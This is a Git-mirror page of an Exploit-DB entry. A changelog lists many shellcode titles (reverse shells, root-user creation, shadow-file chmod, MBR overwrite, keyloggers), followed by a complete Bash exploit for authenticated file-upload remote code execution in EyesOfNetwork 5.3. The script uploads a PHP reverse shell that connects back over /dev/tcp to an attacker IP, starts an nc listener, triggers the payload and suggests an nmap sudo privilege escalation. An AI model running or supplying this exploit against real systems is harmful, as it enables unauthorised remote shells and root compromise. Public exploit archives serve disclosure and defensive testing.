bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/49432.sh
Offensive Security 969e7d6c90 DB: 2021-01-16 
13 changes to exploits/shellcodes

Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS
E-Learning System 1.0 - Authentication Bypass & RCE POC
Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)
PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)
WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)
Online Hotel Reservation System 1.0 - 'description' Stored Cross-site Scripting
Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection
Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)
Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection
EyesOfNetwork 5.3 - File Upload Remote Code Execution

BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)
BSD/x86 - execve(/bin/sh) + Encoded Shellcode (49 bytes)
FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)
FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)
FreeBSD x86/x64 - execve(/bin/sh) + Anti-Debugging Shellcode (140 bytes)
FreeBSD/x86 - setreuid() + execve(pfctl -d) Shellcode (56 bytes)

FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)
FreeBSD/x86 - execve(/bin/sh) + Encoded Shellcode (48 bytes)

Linux/PPC - read + exec Shellcode (32 bytes)
Linux/PPC - read() + exec Shellcode (32 bytes)

Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)
Linux/x86 - Append RSA Key To /root/.ssh/authorized_keys2 Shellcode (295 bytes)

Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download File (cb) + Execute Shellcode (149 bytes)

Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)
Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)

Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)
Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive + Payload Loader Shellcode (68+ bytes)

BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)
BSD/x86 - symlink /bin/sh Shellcode (32 bytes)

Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes)

Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)
Linux/x86 - Add Root User (toor) To /etc/passwd + No Password + exit() Shellcode (107 bytes)

Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - execve(_/bin/sh__ _0__ _0_) With umask 16 (sys_umask(14)) Shellcode (45 bytes)

Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x64 - setuid(0) + chmod (/etc/passwd 0777) + exit(0) Shellcode (63 bytes)
Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)
Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)
Linux/ARM - chmod(/etc/shadow 0777) + Polymorphic Shellcode (84 bytes)
Linux/ARM - chmod(/etc/shadow 0777) Shellcode (35 bytes)

Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)
Linux/x86 - Bind (6778/TCP) Shell + Polymorphic + XOR Encoded Shellcode (125 bytes)

Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - Bind (0x1337/TCP) Listener + Receive + Payload Loader Shellcode

Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod (/etc/shadow 0666) + exit(0) Shellcode (43 bytes)

Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)
Windows - Download File + Execute Via DNS + IPv6 Shellcode (Generator) (Metasploit)

Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)
Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)

Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid() + Execute /bin/bash Obfuscated Shellcode (521 bytes)

Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)
Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts Shellcode (77 bytes)

Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes)
Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)
Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)
Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)
Windows/x64 (XP) - Download File + Execute Shellcode Using PowerShell (Generator)
Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes)
Linux/MIPS (Little Endian) - chmod(/etc/passwd 666) Shellcode (55 bytes)

Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)
Linux/x86 - execve(/bin/sh) + ROT13 Encoded Shellcode (68 bytes)

Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)
Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts + Obfuscated Shellcode (98 bytes)

Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - Custom execve() + 'Followtheleader' Shellcode (Encoder/Decoder) (Generator)

Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)
Linux/x86 - mkdir(HACK) + chmod 777 + exit(0) Shellcode (29 bytes)

Linux/x86 - Reboot() Shellcode (28 bytes)
Linux/x86 - reboot() Shellcode (28 bytes)

Linux/x64 - execve() Encoded Shellcode (57 bytes)
Linux/x64 - execve() + Encoded Shellcode (57 bytes)

Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes)

Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)
Windows - Keylogger To File (./log.bin) + Null-Free Shellcode (431 bytes)

Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)
Windows - Keylogger To File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)

BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)

Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)
BSD/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)
Linux/x86 - Write To /etc/passwd With uid(0) + gid(0) Shellcode (74 bytes)
BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (31 bytes)

Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)
Linux/x86 - Audio (knock knock knock) Via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)

Linux/x86 - Remote File Download Shellcode (42 bytes)
Linux/x86 - Download File Shellcode (42 bytes)

Linux/x86 - Reboot() + Mutated + Null-Free Shellcode (55 bytes)
Linux/x86 - reboot() + Mutated + Null-Free Shellcode (55 bytes)

Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - execve(wget) + Mutated + Null-Free Shellcode (96 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)
Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + Execute Shellcode (108 bytes)
Linux/x86 - execve(/bin/sh) Using jump/call/pop Shellcode (52 bytes)
Linux/x86 - Copy /etc/passwd To /tmp/outfile Shellcode (97 bytes)

Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Linux/x64 - execve(/bin/sh -c reboot) Shellcode (89 bytes)

Linux/x64 - mkdir() Shellcode (25 bytes)
Linux/x64 - mkdir(ajit) Shellcode (25 bytes)

IRIX - Bind (/TCP)Shell (/bin/sh) Shellcode (364 bytes)
IRIX - Bind (/TCP) Shell (/bin/sh) Shellcode (364 bytes)
Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)
Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)
Linux/ARM - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (79 bytes)
Linux/ARM - chmod(/etc/passwd 0777) Shellcode (39 bytes)

Linux/x64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (27 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (110 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) To /etc/hosts Shellcode (96 bytes)
Linux/x64 - shutdown -h now Shellcode (65 bytes)
Linux/x64 - shutdown -h now Shellcode (64 bytes)
Linux/x64 - /sbin/shutdown -h now Shellcode (65 bytes)
Linux/x64 - /sbin/shutdown -h now Shellcode (64 bytes)
Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode
Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)
Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
Linux/x86 - NOT Encoder / Decoder - execve(/bin/sh) Shellcode (44 bytes)
Linux/x64 - execve(/bin/sh) + Custom Encoded XOR Shellcode
Linux/x64 - execve(/bin/sh)  + Custom Encoded XOR + Polymorphic Shellcode (Generator)
Linux/x64 - execve(/bin/sh) + Twofish Encoded + DNS (CNAME) Password + Shellcode
Linux/x86 - execve(/bin/sh) + NOT Encoder / Decoder Shellcode (44 bytes)

Linux/x64 - x64 Assembly Shellcode (Generator)
Linux/x64 - execve() Assembly Shellcode (Generator)

Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (37 bytes)

Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes)
Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + IPv4/6 Shellcode (146 bytes)
Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)
Linux/ARM -  execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager Shellcode (28 Bytes)
Linux/ARM - execve(_/bin/sh__ NULL_ NULL) + read(0_ buf_ 0xff) Stager  Shellcode (20 Bytes)

Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)
Linux/x86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)

Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)
Linux/ARM -  execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (4 Bytes)

Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)
Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes)

Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes)
Linux/x86 - execve(/usr/bin/head -n99 cat etc/passwd) Shellcode (61 Bytes)
Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)
Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)
Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + Execute Shellcode (119 bytes)
Windows/x86 (XP Pro SP3) - Download File Via TFTP + Execute Shellcode (51-60 bytes) (Generator)
Linux/ARM - Reverse TCP (192.168.1.124:4321) Shell (/bin/sh) Shellcode (64 bytes)
Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)
Linux/ARM - Reverse (192.168.1.124:4321/TCP) Shell (/bin/sh) Shellcode (64 bytes)
Windows/x86 - Download File (http://192.168.0.13/ms.msi) Via msiexec + Execute Shellcode (95 bytes)

Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)

Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)
Linux/x86 - Add User (sshd/root) To /etc/passwd Shellcode (149 bytes)

Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)
Linux/x86 - cat .bash_history + base64 Encode + cURL (http://localhost:8080) Shellcode (125 bytes)

Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)
Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) Shellcode (91 Bytes) (Generator)

Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)
Linux/x86 - Shred File (test.txt) Shellcode (72 bytes)

Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (23 bytes)

Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
Linux/x86 -  execve(/bin/sh)  + Reposition + INC Encoder Shellcode (66 bytes)

Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)
Windows/x86 - Download File (http://192.168.10.10/evil.exe _c:\evil.exe_) Via bitsadmin  + Execute Shellcode (210 Bytes)

Linux/x86 - Chmod + Execute (/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)
Linux/x86 - chmod + execute(/usr/bin/wget http://192.168.1.93//x) + Hide Output Shellcode (129 bytes)

Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)
Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (140 bytes)
Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)
Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)
Linux/ARM64 -  execve(_/bin/sh__ NULL_ NULL) + mmap() + read() Stager Shellcode (60 Bytes)
Linux/ARM64 - execve(_/bin/sh__ NULL_ NULL) + Jump Back Shellcode (8 Bytes)

Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) Using JMP-CALL-POP Shellcode (21 bytes)
Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode (168 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)
Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)
Linux/x86 - execve(/bin/sh)  + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)
Linux/x86 - chmod(/etc/shadow_ 0666) + Polymorphic Shellcode (53 bytes)
Linux/x86 -  Disable ASLR Security  + Polymorphic Shellcode (107 bytes)

Linux/x86_64 - AVX2 XOR Decoder + execve(_/bin/sh_) Shellcode (62 bytes)
Linux/x86_64 - execve(_/bin/sh_) + AVX2 XOR Decoder Shellcode (62 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)
Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)
Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (107 Bytes)
Linux/x86 - Bind (43690/TCP) + Null-Free Shellcode (53 Bytes)
Linux/x86 - execve(/bin/sh)  + NOT + XOR-N + Random Encoded Shellcode (132 bytes)
Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode (25 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)
Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)
Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)
Windows/7 - Screen Lock Shellcode (9 bytes)
Linux/x86 - Add Root User (vl43ck/test) To /etc/passwd Shellcode (59 bytes)
Linux/x86 - adduser (User) To /etc/passwd Shellcode (74 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)
Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (91 bytes)
Linux/x86 - execve(/bin/sh) Socket Reuse Shellcode (42 bytes)
Linux/x86 - execve(/bin/sh) + NOT|ROT+8 Encoded + Null-Free Shellcode (47 bytes)
Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Free Shellcode (188 bytes)
Linux/x86 - execve() + Alphanumeric Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) + Random Bytes Encoder + XOR/SUB/NOT/ROR Shellcode (114 bytes)
Windows/x64 (7) - Screen Lock Shellcode (9 bytes)

Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
Windows/x86 - WinExec Calc.exe +  Null-Free Shellcode (195 bytes)

Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)
Linux/x86 - Reboot + Polymorphic Shellcode (26 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
Linux/ARM - execve /bin/dash Shellcode (32 bytes)
Windows/x86 - MSVCRT System + Dynamic Null-Free + Add RDP Admin (MajinBuu/TurnU2C@ndy!!) + Disable Firewall + Enable RDP Shellcode (644 Bytes)
Linux/x64 - Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Password (P3WP3Wl4ZerZ) + Null-free Shellcode (272 Bytes)
Linux/ARM - execve(/bin/dash) Shellcode (32 bytes)

Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)
Linux/x86 -  Disable ASLR Security + Polymorphic Shellcode (124 bytes)

Windows/x86 - Download using mshta.exe Shellcode (100 bytes)
Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)
2021-01-16 05:01:56 +00:00

132 lines
No EOL
7.1 KiB
Bash
Executable file
Raw Blame History

# Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution
# Date: 10/01/2021
# Exploit Author: Ariane.Blow
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3-10 (12/9/2020-lastest)
#!/bin/bash
# (/!\) You may have change this string : "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group, you find this in the cookies params /!\
###############################################
# (Authentified) #
# Abritraty file upload #
# It whase a Challenge to do that in BASH #
# But the exploit's working fine ! #
# ........... #
# Exploit is working with the actual version #
# Scripted on 01/10/2021 #
# By Ariane.Blow #
# https://ariane.agency/ #
###############################################
banner()
{
clear
echo " ,*-."
echo ' | |'
echo ' ,. | |'
echo ' | |_| | ,.'
echo ' `---. |_| |'
echo ' | .--`'
echo " | |"
echo " | |"
echo ""Ω
echo " ! DO NOT USE IF YOU DONT HAVE PERSMISSION !"
echo ""
echo " EyesOfNetwork 5.3-10"
echo ""
echo " RedTeam Tool"
echo ""
echo " Input verification desertion"
echo ""
echo " RCE via Arbitrary FileUpload"
echo ""
echo ""
}
VAR()
{
#var
#Beacause I don't whant to see all the *.sh in my OPT directory ... BashMan Tips xD !
mkdir /tmp/EON53
cd /tmp/EON53
#you can not upload more than 1 file with a same URL and same filename, i just add a random char at the end of URL and in the filename
export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9)
export filename=shell$random.xml.php
echo "EyesOfNetwork IP :"
read eonIP
echo "HackerIP (used to start the listener) :"
read hackerIP
echo "Hacker PORT (used to start the listener):"
read PORT
echo "Username (default = admin) :"
read username
echo "password :"
read password
}
#Getting the session_id
GetSessionID()
{
echo "getting sessionID ... "
echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh
chmod +x GetSession.sh
sessionID=$(./GetSession.sh)
echo "sessionID acquired : $sessionID"
sleep 3
echo
}
#start listener
start_listen()
{
printf "\e[31;1m When the Reverse-Shell is etablished, you can PrivEsc with :\e[0m \n"
echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script"
echo "sudo nmap --script=/tmp/nmap.script"
printf "\e[31;1m ... I Know ... \e[0m \n"
echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh
chmod +x listen.sh
./listen.sh
}
#POST payload
Payload()
{
echo "Sending PostRequest ..."
echo "curl -i -s -k -X $'POST' \
-H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \
-b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \
--data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a<?php\x0d\x0aexec(\"/bin/bash -c \'bash -i > /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \
$'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh
chmod +x req.sh
./req.sh
}
#Get request on PHP exploit
Req_payload()
{
echo "Get request on the PHP payload ..."
echo "curl -i -s -k -X $'GET' \
-H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \
-b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \
$'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh
chmod +x reqGET.sh
./reqGET.sh
}
#Clearing
Clear_cache()
{
echo "clearing cache"
rm listen.sh
rm req.sh
rm reqGET.sh
rm GetSession.sh
cd ..
rmdir EON53
}
#MAIN
banner
VAR
GetSessionID
start_listen
Payload
Req_payload
Clear_cache
Reference in a new issue View git blame Copy permalink